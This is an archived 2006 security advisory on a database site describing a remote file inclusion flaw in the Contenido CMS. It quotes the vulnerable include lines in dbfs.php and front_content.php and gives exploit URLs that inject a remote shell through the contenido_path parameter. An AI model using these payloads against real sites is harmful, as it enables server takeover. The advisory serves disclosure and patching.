Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14679
HistoryOct 13, 2006 - 12:00 a.m.

CMS contenido Remote File Inclusion

2006-10-1300:00:00
vulners.com
23
JSON
                         CMS contenido Remote File Inclusion

                      Affected Software .: CMS contenido
                      Download..: http://www.contenido.org/opensourcecms/en/index-a-104.html
                      Risk ..............: high                              
                      Found by ..........: CvIr.System                                                  
                      Contact ...........: CvIr.System[at]gmail.com                                   


     Affected File:                                                                
cms/dbfs.php

 Vulnerable Code:

include_once ($contenido_path . "includes/startup.php");


     Affected File:                                                                
cms/front_content.php

include_once ($contenido_path."includes/startup.php");

Exploit:

http://[target]/cms/dbfs.php?contenido_path=[shell]? 
http://[target]/cms/front_content.php?contenido_path=[shell]? 


Fixed bug:

if(isset($_GET['contenido_path']))
 {
echo "Fixed bug by CvIr.System";
exit;
}

Special GreetingS:ANtrAX|Azrael|her0|Matasanos|Ednux|4ur3v0ir|FR34K|Hanowars|Bacan|xarnuz|Slappter|mnox|Zickox|Txis|The Shredder|FaLeNcE|Darkness-Mx| www.c-group.org

JSON